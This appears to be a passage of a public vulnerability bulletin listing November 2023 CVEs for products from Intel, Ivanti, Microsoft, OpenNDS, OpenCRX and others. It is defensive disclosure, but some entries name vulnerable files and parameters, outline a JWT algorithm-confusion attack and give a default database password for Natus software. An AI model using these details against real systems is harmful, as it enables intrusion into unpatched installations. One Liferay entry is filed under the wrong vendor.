intel(r) — xtu Uncontrolled search path element in some Intel(R) XTU software before version 7.12.0.15 may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-34350
intel(r) — server_board
 
Improper buffer restrictions in some Intel(R) Server Board M10JNP2SB BIOS firmware before version 7.219 may allow a privileged user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2022-29510
intel(r) — aptio*_v_uefi_firmware_integrator_tools Integer overflow in some Intel(R) Aptio* V UEFI Firmware Integrator Tools may allow an authenticated user to potentially enable denial of service via local access. 2023-11-14 not yet calculated CVE-2023-22305
intel(r) — aptio*_v_uefi_firmware_integrator_tools
 
Race condition in some Intel(R) Aptio* V UEFI Firmware Integrator Tools may allow an authenticated user to potentially enable denial of service via local access. 2023-11-14 not yet calculated CVE-2023-22310
intel(r) — chipset_device_software
 
Uncontrolled search path element in some Intel(R) Chipset Device Software before version 10.1.19444.8378 may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-28388
intel(r) — multiple_products Improper authentication in some Intel(R) NUC Kits NUC7PJYH and NUC7CJYH Realtek* SD Card Reader Driver installation software before version 10.0.19041.29098 may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-32661
intel(r) — multiple_products Uncontrolled search path in some Intel(R) NUC 12 Pro Kits & Mini PCs – NUC12WS Intel(R) HID Event Filter Driver installation software before version 2.2.2.1 for Windows may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-33874
intel(r) — ofu_software
 
Improper access control in some Intel(R) OFU software before version 14.1.31 may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-29157
intel(r) — ofu_software
 
Uncontrolled search path in some Intel(R) OFU software before version 14.1.31 may allow an authenticated user to potentially enable escalation of privilege via local access. 2023-11-14 not yet calculated CVE-2023-29161
intel(r) — openvino_toolkit_software
 
Protection mechanism failure in some Intel(R) Distribution of OpenVINO toolkit software before version 2023.0.0 may allow an authenticated user to potentially enable information disclosure via local access. 2023-11-14 not yet calculated CVE-2023-25080
intel(r) — openvino_toolkit_software
 
Improper input validation in some OpenVINO Model Server software before version 2022.3 for Intel Distribution of OpenVINO toolkit may allow an unauthenticated user to potentially enable denial of service via network access. 2023-11-14 not yet calculated CVE-2023-31203
intel_support — android_application Improper access control in the Intel Support android application all versions may allow an authenticated user to potentially enable information disclosure via local access. 2023-11-14 not yet calculated CVE-2023-33872
intelbras — rx_1500
 
A vulnerability has been found in Intelbras RX 1500 1.1.9 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /WiFi.html of the component SSID Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-245065 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-11-13 not yet calculated CVE-2023-6103

 

inventory_management — inventory_management SQL injection vulnerability in Inventory Management v.1.0 allows a local attacker to execute arbitrary SQL commands via the id parameter in the deleteProduct.php component. 2023-11-14 not yet calculated CVE-2023-46582
ivanti — epmm A security vulnerability in EPMM Versions 11.10, 11.9 and 11.8 older allows a threat actor with knowledge of an enrolled device identifier to access and extract sensitive information, including device and environment configuration details, as well as secrets. This vulnerability poses a serious security risk, potentially exposing confidential data and system integrity. 2023-11-15 not yet calculated CVE-2023-39337
ivanti — secure_access_client When a specific component is loaded a local attacker and is able to send a specially crafted request to this component, the attacker could gain elevated privileges on the affected system. 2023-11-15 not yet calculated CVE-2023-38043
ivanti — secure_access_client When a specific component is loaded a local attacker and is able to send a specially crafted request to this component, the attacker could gain elevated privileges on the affected system. 2023-11-15 not yet calculated CVE-2023-38543
ivanti — secure_access_file When a particular process flow is initiated, an attacker may be able to gain unauthorized elevated privileges on the affected system when having control over a specific file. 2023-11-15 not yet calculated CVE-2023-41718
ivanti — secure_access_setting A logged in user can modify specific files that may lead to unauthorized changes in system-wide configuration settings. This vulnerability could be exploited to compromise the integrity and security of the network on the affected system. 2023-11-15 not yet calculated CVE-2023-38544
ivanti — secure_access_windows A vulnerability has been identified in the Ivanti Secure Access Windows client, which could allow a locally authenticated attacker to exploit a vulnerable configuration, potentially leading to various security risks, including the escalation of privileges, denial of service, or information disclosure. 2023-11-15 not yet calculated CVE-2023-35080
ivanti — epmm A security vulnerability has been identified in EPMM Versions 11.10, 11.9 and 11.8 and older allowing an unauthenticated threat actor to impersonate any existing user during the device enrollment process. This issue poses a significant security risk, as it enables unauthorized access and potential misuse of user accounts and resources. 2023-11-15 not yet calculated CVE-2023-39335
json-web-token — json-web-token
 
joaquimserafim/json-web-token is a javascript library use to interact with JSON Web Tokens (JWT) which are a compact URL-safe means of representing claims to be transferred between two parties. Affected versions of the json-web-token library are vulnerable to a JWT algorithm confusion attack. On line 86 of the ‘index.js’ file, the algorithm to use for verifying the signature of the JWT token is taken from the JWT token, which at that point is still unverified and thus shouldn’t be trusted. To exploit this vulnerability, an attacker needs to craft a malicious JWT token containing the HS256 algorithm, signed with the public RSA key of the victim application. This attack will only work against this library is the RS256 algorithm is in use, however it is a best practice to use that algorithm. 2023-11-17 not yet calculated CVE-2023-48238
kainex — wise_chat Cross-Site Request Forgery (CSRF) vulnerability in Kainex Wise Chat. This issue affects Wise Chat: from n/a through 3.1.3. 2023-11-18 not yet calculated CVE-2023-32504
kloudq_technologies — multiple_products An issue in Kloudq Technologies Limited Tor Equip 1.0, Tor Loco Mini 1.0 through 3.1 allows a remote attacker to execute arbitrary code via a crafted request to the MQTT component. 2023-11-15 not yet calculated CVE-2023-41442
kodbox — kodbox
 
kodbox 1.46.01 has a security flaw that enables user enumeration. This problem is present on the login page, where an attacker can identify valid users based on varying response messages, potentially paving the way for a brute force attack. 2023-11-18 not yet calculated CVE-2023-48028
 
kubernetes — kubelet
 
A security issue was discovered in Kubernetes where a user that can create pods and persistent volumes on Windows nodes may be able to escalate to admin privileges on those nodes. Kubernetes clusters are only affected if they are using an in-tree storage plugin for Windows nodes. 2023-11-14 not yet calculated CVE-2023-5528
 
kubernetes — kyverno Kyverno is a policy engine designed for Kubernetes. A security vulnerability was found in Kyverno where an attacker could cause denial of service of Kyverno. The vulnerable component in Kyvernos Notary verifier. An attacker would need control over the registry from which Kyverno would fetch attestations. With such a position, the attacker could return a malicious response to Kyverno, when Kyverno would send a request to the registry. The malicious response would cause denial of service of Kyverno, such that other users’ admission requests would be blocked from being processed. This is a vulnerability in a new component released in v1.11.0. The only users affected by this are those that have been building Kyverno from source at the main branch which is not encouraged. Users consuming official Kyverno releases are not affected. There are no known cases of this vulnerability being exploited in the wild. 2023-11-13 not yet calculated CVE-2023-42813

 

kubernetes — kyverno Kyverno is a policy engine designed for Kubernetes. A security vulnerability was found in Kyverno where an attacker could cause denial of service of Kyverno. The vulnerable component in Kyvernos Notary verifier. An attacker would need control over the registry from which Kyverno would fetch attestations. With such a position, the attacker could return a malicious response to Kyverno, when Kyverno would send a request to the registry. The malicious response would cause denial of service of Kyverno, such that other users’ admission requests would be blocked from being processed. This is a vulnerability in a new component released in v1.11.0. The only users affected by this are those that have been building Kyverno from source at the main branch which is not encouraged. Users consuming official Kyverno releases are not affected. There are no known cases of this vulnerability being exploited in the wild. 2023-11-13 not yet calculated CVE-2023-42814

 

kubernetes — kyverno Kyverno is a policy engine designed for Kubernetes. A security vulnerability was found in Kyverno where an attacker could cause denial of service of Kyverno. The vulnerability was in Kyvernos Notary verifier. An attacker would need control over the registry from which Kyverno would fetch signatures. With such a position, the attacker could return a malicious response to Kyverno, when Kyverno would send a request to the registry. The malicious response would cause denial of service of Kyverno, such that other users’ admission requests would be blocked from being processed. This is a vulnerability in a new component released in v1.11.0. The only users affected by this are those that have been building Kyverno from source at the main branch which is not encouraged. Users consuming official Kyverno releases are not affected. There are no known cases of this vulnerability being exploited in the wild. 2023-11-13 not yet calculated CVE-2023-42815

 

kubernetes — kyverno Kyverno is a policy engine designed for Kubernetes. A security vulnerability was found in Kyverno where an attacker could cause denial of service of Kyverno. The vulnerability was in Kyvernos Notary verifier. An attacker would need control over the registry from which Kyverno would fetch signatures. With such a position, the attacker could return a malicious response to Kyverno, when Kyverno would send a request to the registry. The malicious response would cause denial of service of Kyverno, such that other users’ admission requests would be blocked from being processed. This is a vulnerability in a new component released in v1.11.0. The only users affected by this are those that have been building Kyverno from source at the main branch which is not encouraged. Users consuming official Kyverno releases are not affected. There are no known cases of this vulnerability being exploited in the wild. 2023-11-13 not yet calculated CVE-2023-42816

 

kyverno — kyverno
 
Kyverno is a policy engine designed for Kubernetes. An issue was found in Kyverno that allowed an attacker to control the digest of images used by Kyverno users. The issue would require the attacker to compromise the registry that the Kyverno users fetch their images from. The attacker could then return a vulnerable image to the user and leverage that to further escalate their position. As such, the attacker would need to know which images the Kyverno user consumes and know of one of multiple exploitable vulnerabilities in previous digests of the images. Alternatively, if the attacker has compromised the registry, they could craft a malicious image with a different digest with intentionally placed vulnerabilities and deliver the image to the user. Users pulling their images by digests and from trusted registries are not impacted by this vulnerability. There is no evidence of this being exploited in the wild. The issue has been patched in 1.10.5. All users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-14 not yet calculated CVE-2023-47630
label_studio — label_studio Label Studio is an open source data labeling tool. In all current versions of Label Studio prior to 1.9.2post0, the application allows users to insecurely set filters for filtering tasks. An attacker can construct a filter chain to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django’s Object Relational Mapper (ORM). Since the results of query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character. In addition, Label Studio had a hard coded secret key that an attacker can use to forge a session token of any user by exploiting this ORM Leak vulnerability to leak account password hashes. This vulnerability has been addressed in commit `f931d9d129` which is included in the 1.9.2post0 release. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-13 not yet calculated CVE-2023-47117
 
libde265 — libde265
 
Buffer Overflow vulnerability in strukturag libde265 v1.10.12 allows a local attacker to cause a denial of service via the slice_segment_header function in the slice.cc component. 2023-11-16 not yet calculated CVE-2023-47471
 
liblisp — liblisp
 
Liblisp through commit 4c65969 was discovered to contain a use-after-free vulnerability in void hash_destroy(hash_table_t *h) at hash.c 2023-11-17 not yet calculated CVE-2023-48024
liblisp — liblisp
 
Liblisp through commit 4c65969 was discovered to contain a out-of-bounds-read vulnerability in unsigned get_length(lisp_cell_t * x) at eval.c 2023-11-17 not yet calculated CVE-2023-48025
librenms — librenms LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring which includes support for a wide range of network hardware and operating systems. In affected versions the login method has no rate limit. An attacker may be able to leverage this vulnerability to gain access to user accounts. This issue has been addressed in version 23.11.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-17 not yet calculated CVE-2023-46745
librenms — librenms
 
LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring which includes support for a wide range of network hardware and operating systems. In affected versions of LibreNMS when a user accesses their device dashboard, one request is sent to `graph.php` to access graphs generated on the particular Device. This request can be accessed by a low privilege user, and they can enumerate devices on librenms with their id or hostname. Leveraging this vulnerability, a low privilege user can see all devices registered by admin users. This vulnerability has been addressed in commit `489978a923` which has been included in release version 23.11.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-17 not yet calculated CVE-2023-48294

 

librenms — librenms
 
LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring which includes support for a wide range of network hardware and operating systems. Affected versions are subject to a cross site scripting (XSS) vulnerability in the device group popups. This issue has been addressed in commit `faf66035ea` which has been included in release version 23.11.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-11-17 not yet calculated CVE-2023-48295

 

limesurvey — limesurvey Cross Site Scripting (XSS) vulnerability in LimeSurvey before version 6.2.9-230925 allows a remote attacker to escalate privileges via a crafted script to the _generaloptions_panel.php component. 2023-11-18 not yet calculated CVE-2023-44796

 

linux — kernel
 
An out-of-bounds read vulnerability was found in the NVMe-oF/TCP subsystem in the Linux kernel. This flaw allows a remote attacker to send a crafted TCP packet, triggering a heap-based buffer overflow that results in kmalloc data to be printed (and potentially leaked) to the kernel ring buffer (dmesg). 2023-11-16 not yet calculated CVE-2023-6121
 
linux — kernel
 
A null pointer dereference flaw was found in the Linux kernel API for the cryptographic algorithm scatterwalk functionality. This issue occurs when a user constructs a malicious packet with specific socket configuration, which could allow a local user to crash the system or escalate their privileges on the system. 2023-11-16 not yet calculated CVE-2023-6176

 

lmxcms — lmxcms SQL injection vulnerability in LMXCMS v.1.4 allows attacker to execute arbitrary code via the TagsAction.class. 2023-11-16 not yet calculated CVE-2021-35437
localstack — localstack
 
Missing SSL certificate validation in localstack v2.3.2 allows attackers to eavesdrop on communications between the host and server via a man-in-the-middle attack. 2023-11-16 not yet calculated CVE-2023-48054
ly_corporation — line
 
nagayama_copabowl Line 13.6.1 is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor. 2023-11-16 not yet calculated CVE-2023-48134
maiwei — safety_production_control_platform A vulnerability, which was classified as problematic, was found in Maiwei Safety Production Control Platform 4.1. Affected is an unknown function of the file /Content/Plugins/uploader/FileChoose.html?fileUrl=/Upload/File/Pics/&parent. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-245064. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-11-13 not yet calculated CVE-2023-6102
 
maiwei — safety_production_control_platform
 
A vulnerability classified as problematic was found in Maiwei Safety Production Control Platform 4.1. This vulnerability affects unknown code of the file /api/DataDictionary/GetItemList. The manipulation leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-245062 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-11-13 not yet calculated CVE-2023-6100
 
maiwei — safety_production_control_platform
 
A vulnerability, which was classified as problematic, has been found in Maiwei Safety Production Control Platform 4.1. This issue affects some unknown processing of the file /TC/V2.7/ha.html of the component Intelligent Monitoring. The manipulation leads to information disclosure. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-245063. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-11-13 not yet calculated CVE-2023-6101
 
manageengine — service_desk_plus
 
An information disclosure vulnerability exists in multiple ManageEngine products that can result in encryption keys being exposed. A low-privileged OS user with access to the host where an affected ManageEngine product is installed can view and use the exposed key to decrypt product database passwords. This allows the user to access the ManageEngine product database. 2023-11-15 not yet calculated CVE-2023-6105
microsoft — dhcp_server DHCP Server Service Denial of Service Vulnerability 2023-11-14 not yet calculated CVE-2023-36392
microsoft — dynamics Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability 2023-11-14 not yet calculated CVE-2023-36016
microsoft — dynamics Microsoft Dynamics 365 Sales Spoofing Vulnerability 2023-11-14 not yet calculated CVE-2023-36030
microsoft — dynamics Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability 2023-11-14 not yet calculated CVE-2023-36031
microsoft — dynamics Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability 2023-11-14 not yet calculated CVE-2023-36410
microsoft — edge_chromium
 
Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability 2023-11-16 not yet calculated CVE-2023-36008
microsoft — edge_chromium
 
Microsoft Edge (Chromium-based) Spoofing Vulnerability 2023-11-16 not yet calculated CVE-2023-36026
microsoft — excel Microsoft Excel Security Feature Bypass Vulnerability 2023-11-14 not yet calculated CVE-2023-36037
microsoft — excel Microsoft Excel Remote Code Execution Vulnerability 2023-11-14 not yet calculated CVE-2023-36041
 
microsoft — exchange_server Microsoft Exchange Server Spoofing Vulnerability 2023-11-14 not yet calculated CVE-2023-36035
microsoft — exchange_server Microsoft Exchange Server Spoofing Vulnerability 2023-11-14 not yet calculated CVE-2023-36039
microsoft — exchange_server Microsoft Exchange Server Remote Code Execution Vulnerability 2023-11-14 not yet calculated CVE-2023-36439
microsoft — host_integration_server Microsoft Host Integration Server 2020 Remote Code Execution Vulnerability 2023-11-14 not yet calculated CVE-2023-38151
microsoft — local_security_authority_subsystem_service Microsoft Local Security Authority Subsystem Service Information Disclosure Vulnerability 2023-11-14 not yet calculated CVE-2023-36428
microsoft — multiple_products .NET, .NET Framework, and Visual Studio Elevation of Privilege Vulnerability 2023-11-14 not yet calculated CVE-2023-36049
microsoft — office Microsoft Office Graphics Remote Code Execution Vulnerability 2023-11-14 not yet calculated CVE-2023-36045
microsoft — on-prem_data_gateway Microsoft On-Prem Data Gateway Security Feature Bypass Vulnerability 2023-11-14 not yet calculated CVE-2023-36021
microsoft — remote_registry_service Microsoft Remote Registry Service Remote Code Execution Vulnerability 2023-11-14 not yet calculated CVE-2023-36401
microsoft — remote_registry_service Microsoft Remote Registry Service Remote Code Execution Vulnerability 2023-11-14 not yet calculated CVE-2023-36423
microsoft — send_customer_voice Microsoft Send Customer Voice survey from Dynamics 365 Spoofing Vulnerability 2023-11-14 not yet calculated CVE-2023-36007
microsoft — sharepoint_server Microsoft SharePoint Server Remote Code Execution Vulnerability 2023-11-14 not yet calculated CVE-2023-38177
microsoft — speech_application_programming_interface Microsoft Speech Application Programming Interface (SAPI) Elevation of Privilege Vulnerability 2023-11-14 not yet calculated CVE-2023-36719
microsoft — visual_studio Visual Studio Denial of Service Vulnerability 2023-11-14 not yet calculated CVE-2023-36042
microsoft — wdac_ole_db Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability 2023-11-14 not yet calculated CVE-2023-36402
microsoft — windows ASP.NET Core – Security Feature Bypass Vulnerability 2023-11-14 not yet calculated CVE-2023-36558
microsoft — windows ASP.NET Security Feature Bypass Vulnerability 2023-11-14 not yet calculated CVE-2023-36560
microsoft — windows_defender Microsoft Windows Defender Elevation of Privilege Vulnerability 2023-11-14 not yet calculated CVE-2023-36422
microsoft — exchange Microsoft Exchange Server Spoofing Vulnerability 2023-11-14 not yet calculated CVE-2023-36050
microsoft — office Microsoft Office Security Feature Bypass Vulnerability 2023-11-14 not yet calculated CVE-2023-36413
microsoft — protected_extensible_authentication_protocol Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability 2023-11-14 not yet calculated CVE-2023-36028
mikrotik — routeros MikroTik RouterOS v7.1 to 7.11 was discovered to contain incorrect access control mechanisms in place for the Rest API. 2023-11-14 not yet calculated CVE-2023-41570
misp — misp
 
An issue was discovered in MISP before 2.4.176. app/Controller/Component/IndexFilterComponent.php does not properly filter out query parameters. 2023-11-17 not yet calculated CVE-2023-48655
 
misp — misp
 
An issue was discovered in MISP before 2.4.176. app/Model/AppModel.php mishandles order clauses. 2023-11-17 not yet calculated CVE-2023-48656
 
misp — misp
 
An issue was discovered in MISP before 2.4.176. app/Model/AppModel.php mishandles filters. 2023-11-17 not yet calculated CVE-2023-48657
 
misp — misp
 
An issue was discovered in MISP before 2.4.176. app/Model/AppModel.php lacks a checkParam function for alphanumerics, underscore, dash, period, and space. 2023-11-17 not yet calculated CVE-2023-48658
 
misp — misp
 
An issue was discovered in MISP before 2.4.176. app/Controller/AppController.php mishandles parameter parsing. 2023-11-17 not yet calculated CVE-2023-48659
 
mlflow — mlflow
 
An attacker is able to arbitrarily create an account in MLflow bypassing any authentication requirment. 2023-11-16 not yet calculated CVE-2023-6014
mlflow — mlflow
 
MLflow allowed arbitrary files to be PUT onto the server. 2023-11-16 not yet calculated CVE-2023-6015
mlflow — mlflow
 
An attacker can overwrite any file on the server hosting MLflow without any authentication. 2023-11-16 not yet calculated CVE-2023-6018
mp4box_gpac — mp4box_gpac
 
MP4Box GPAC v2.3-DEV-rev617-g671976fcc-master was discovered to contain a memory leak in the function gf_isom_add_chapter at /isomedia/isom_write.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted MP4 file. 2023-11-14 not yet calculated CVE-2023-47384
multiple_vendors — multiple_products Inadequate encryption strength vulnerability in multiple routers provided by ELECOM CO., LTD. and LOGITEC CORPORATION allows a network-adjacent unauthenticated attacker to guess the encryption key used for wireless LAN communication and intercept the communication. As for the affected products/versions, see the information provided by the vendor under [References] section. 2023-11-16 not yet calculated CVE-2023-43757

 

natus — multiple_products
 
Reflected cross-site scripting (XSS) vulnerability on a content page’s edit page in Liferay Portal 7.4.3.94 through 7.4.3.95 allows remote attackers to inject arbitrary web script or HTML via the `p_l_back_url_title` parameter. 2023-11-17 not yet calculated CVE-2023-47797
natus — multiple_products
 
Natus NeuroWorks and SleepWorks before 8.4 GMA3 utilize a default password of xltek for the Microsoft SQL Server service sa account, allowing a threat actor to perform remote code execution, data exfiltration, or other nefarious actions such as tampering with data or destroying/disrupting MSSQL services. 2023-11-10 not yet calculated CVE-2023-47800
 
nec — multiple_products CLUSTERPRO X Ver5.1 and earlier and EXPRESSCLUSTER X 5.1 and earlier, CLUSTERPRO X SingleServerSafe 5.0 and earlier, EXPRESSCLUSTER X SingleServerSafe 5.0 and earlier allows an attacker to log in to the product may execute an arbitrary command. 2023-11-17 not yet calculated CVE-2023-39544
nec — multiple_products CLUSTERPRO X Ver5.1 and earlier and EXPRESSCLUSTER X 5.1 and earlier, CLUSTERPRO X SingleServerSafe 5.0 and earlier, EXPRESSCLUSTER X SingleServerSafe 5.0 and earlier allows an attacker to log in to the product may execute an arbitrary command. 2023-11-17 not yet calculated CVE-2023-39545
nec — multiple_products CLUSTERPRO X Ver5.1 and earlier and EXPRESSCLUSTER X 5.1 and earlier, CLUSTERPRO X SingleServerSafe 5.0 and earlier, EXPRESSCLUSTER X SingleServerSafe 5.0 and earlier allows an attacker to log in to the product may execute an arbitrary command. 2023-11-17 not yet calculated CVE-2023-39546
nec — multiple_products CLUSTERPRO X Ver5.1 and earlier and EXPRESSCLUSTER X 5.1 and earlier, CLUSTERPRO X SingleServerSafe 5.0 and earlier, EXPRESSCLUSTER X SingleServerSafe 5.0 and earlier allows an attacker to log in to the product may execute an arbitrary command. 2023-11-17 not yet calculated CVE-2023-39547
nec — multiple_products CLUSTERPRO X Ver5.1 and earlier and EXPRESSCLUSTER X 5.1 and earlier, CLUSTERPRO X SingleServerSafe 5.0 and earlier, EXPRESSCLUSTER X SingleServerSafe 5.0 and earlier allows an attacker to log in to the product may execute an arbitrary command. 2023-11-17 not yet calculated CVE-2023-39548
northern.tech — cfeengine_enterprise Northern.tech CFEngine Enterprise before 3.21.3 allows SQL Injection. The fixed versions are 3.18.6 and 3.21.3. The earliest affected version is 3.6.0. The issue is in the Mission Portal login page in the CFEngine hub. 2023-11-14 not yet calculated CVE-2023-45684
open_management_infrastructure — open_management_infrastructure Open Management Infrastructure Information Disclosure Vulnerability 2023-11-14 not yet calculated CVE-2023-36043
opencart — opencart
 
An issue discovered in OpenCart 4.0.0.0 to 4.0.2.3 allows authenticated backend users having common/security write privilege can write arbitrary untrusted data inside config.php and admin/config.php, resulting in remote code execution on the underlying server. 2023-11-15 not yet calculated CVE-2023-47444
opencrx — opencrx
 
OpenCRX version 5.2.0 is vulnerable to HTML injection via the Activity Search Criteria-Activity Number. 2023-11-18 not yet calculated CVE-2023-40809
opencrx — opencrx
 
OpenCRX version 5.2.0 is vulnerable to HTML injection via Product Name Field. 2023-11-18 not yet calculated CVE-2023-40810
opencrx — opencrx
 
OpenCRX version 5.2.0 is vulnerable to HTML injection via the Accounts Group Name Field. 2023-11-18 not yet calculated CVE-2023-40812
opencrx — opencrx
 
OpenCRX version 5.2.0 is vulnerable to HTML injection via Activity Saved Search Creation. 2023-11-18 not yet calculated CVE-2023-40813
opencrx — opencrx
 
OpenCRX version 5.2.0 is vulnerable to HTML injection via the Accounts Name Field. 2023-11-18 not yet calculated CVE-2023-40814
opencrx — opencrx
 
OpenCRX version 5.2.0 is vulnerable to HTML injection via the Category Creation Name Field. 2023-11-18 not yet calculated CVE-2023-40815
opencrx — opencrx
 
OpenCRX version 5.2.0 is vulnerable to HTML injection via Activity Milestone Name Field. 2023-11-18 not yet calculated CVE-2023-40816
opencrx — opencrx
 
OpenCRX version 5.2.0 is vulnerable to HTML injection via the Product Configuration Name Field. 2023-11-18 not yet calculated CVE-2023-40817
opennds — opennds
 
An issue was discovered in OpenNDS Captive Portal before 10.1.2. it has a do_binauth NULL pointer dereference that can be triggered with a crafted GET HTTP request with a missing client redirect query string parameter. Triggering this issue results in crashing openNDS (a Denial-of-Service condition). The issue occurs when the client is about to be authenticated and can be triggered only when the BinAuth option is set. 2023-11-17 not yet calculated CVE-2023-38313
opennds — opennds
 
An issue was discovered in OpenNDS Captive Portal before version 10.1.2. It has a NULL pointer dereference in preauthenticated() that can be triggered with a crafted GET HTTP request with a missing redirect query string parameter. Triggering this issue results in crashing OpenNDS (a Denial-of-Service condition). 2023-11-17 not yet calculated CVE-2023-38314
opennds — opennds
 
An issue was discovered in OpenNDS Captive Portal before version 10.1.2. It has a try_to_authenticate NULL pointer dereference that can be triggered with a crafted GET HTTP with a missing client token query string parameter. Triggering this issue results in crashing OpenNDS (a Denial-of-Service condition). 2023-11-17 not yet calculated CVE-2023-38315
opennds — opennds
 
An issue was discovered in OpenNDS Captive Portal before version 10.1.2. When the custom unescape callback is enabled, attackers can execute arbitrary OS commands by inserting them into the URL portion of HTTP GET requests. 2023-11-17 not yet calculated CVE-2023-38316
opennds — opennds
 
An issue was discovered in OpenNDS Captive Portal before version 10.1.2. It has a show_preauthpage NULL pointer dereference that can be triggered with a crafted GET HTTP with a missing User-Agent header. Triggering this issue results in crashing OpenNDS (a Denial-of-Service condition). 2023-11-17 not yet calculated CVE-2023-38320
opennds — opennds
 
An issue was discovered in OpenNDS Captive Portal before version 10.1.2. It has a do_binauth NULL pointer dereference that be triggered with a crafted GET HTTP request with a missing User-Agent HTTP header. Triggering this issue results in crashing OpenNDS (a Denial-of-Service condition). The issue occurs when the client is about to be authenticated and can be triggered only when the BinAuth option is set. 2023-11-17 not yet calculated CVE-2023-38322
opennds — opennds
 
An issue was discovered in OpenNDS Captive Portal before version 10.1.2. It allows users to skip the splash page sequence when it is using the default FAS key and when OpenNDS is configured as FAS (default). 2023-11-17 not yet calculated CVE-2023-38324
opennds — opennds
 
An issue was discovered in the captive portal in OpenNDS before version 10.1.3. get_query in http_microhttpd.c does not validate the length of the query string of GET requests. This leads to a stack-based buffer overflow in versions 9.x and earlier, and to a heap-based buffer overflow in versions 10.x and later. Attackers may exploit the issue to crash OpenNDS (Denial-of-Service condition) or to inject and execute arbitrary bytecode (Remote Code Execution). 2023-11-17 not yet calculated CVE-2023-41101
 
opennds — opennds
 
An issue was discovered in the captive portal in OpenNDS before version 10.1.3. It has multiple memory leaks due to not freeing up allocated memory. This may lead to a Denial-of-Service condition due to the consumption of all available memory. 2023-11-17 not yet calculated CVE-2023-41102
 
opennms — multiple_products Cross-site scripting in bootstrap.jsp in multiple versions of OpenNMS Meridian and Horizon allows an attacker access to confidential session information. The solution is to upgrade to Horizon 32.0.5 or newer and Meridian 2023.1.9 or newer Meridian and Horizon installation instructions state that they are intended for installation within an organization’s private networks and should not be directly accessible from the Internet. OpenNMS thanks Moshe Apelbaum for reporting this issue. 2023-11-16 not yet calculated CVE-2023-40314
opensupports — opensupports
 
OpenSupports v4.11.0 is vulnerable to Unrestricted Upload of File with Dangerous Type. In the comment function, an attacker can bypass security restrictions and upload a .bat file by manipulating the file’s magic bytes to masquerade as an allowed type. This can enable the attacker to execute arbitrary code or establish a reverse shell, leading to unauthorized file writes or control over the victim’s station via a crafted file upload operation. 2023-11-17 not yet calculated CVE-2023-48031
 
opentelemetry-go — opentelemetry-go OpenTelemetry-Go Contrib is a collection of third-party packages for OpenTelemetry-Go. Prior to version 0.46.0, the grpc Unary Server Interceptor out of the box adds labels `net.peer.sock.addr` and `net.peer.sock.port` that have unbound cardinality. It leads to the server’s potential memory exhaustion when many malicious requests are sent. An attacker can easily flood the peer address and port for requests. Version 0.46.0 contains a fix for this issue. As a workaround to stop being affected, a view removing the attributes can be used. The other possibility is to disable grpc metrics instrumentation by passing `otelgrpc.WithMeterProvider` option with `noop.NewMeterProvider`. 2023-11-10 not yet calculated CVE-2023-47108

 

openvpn — openvpn
 
Using the –fragment option in certain configuration setups OpenVPN version 2.6.0 to 2.6.6 allows an attacker to trigger a divide by zero behavior which could cause an application crash, leading to a denial of service. 2023-11-11 not yet calculated CVE-2023-46849

 

openvpn — openvpn
 
Use after free in OpenVPN version 2.6.0 to 2.6.6 may lead to undefined behavior, leaking memory buffers or remote execution when sending network buffers to a remote peer. 2023-11-11 not yet calculated CVE-2023-46850

 

palantir — palantir
 
The Gotham video-application-server service contained a race condition which would cause it to not apply certain acls new videos if the source system had not yet initialized. 2023-11-15 not yet calculated CVE-2023-30954
papercut — papercut_mf/ng
 
This vulnerability allows local attackers to escalate privileges on affected installations of PaperCut NG. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the pc-pdl-to-image process. The process loads an executable from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. 2023-11-14 not yet calculated CVE-2023-6006
 
payara_platform — multiple_products URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in Payara Platform Payara Server, Micro and Embedded (Servlet Implementation modules) allows Redirect Access to Libraries. This issue affects Payara Server, Micro and Embedded: from 5.0.0 before 5.57.0, from 4.1.2.191 before 4.1.2.191.46, from 6.0.0 before 6.8.0, from 6.2023.1 before 6.2023.11. 2023-11-15 not yet calculated CVE-2023-41699
 
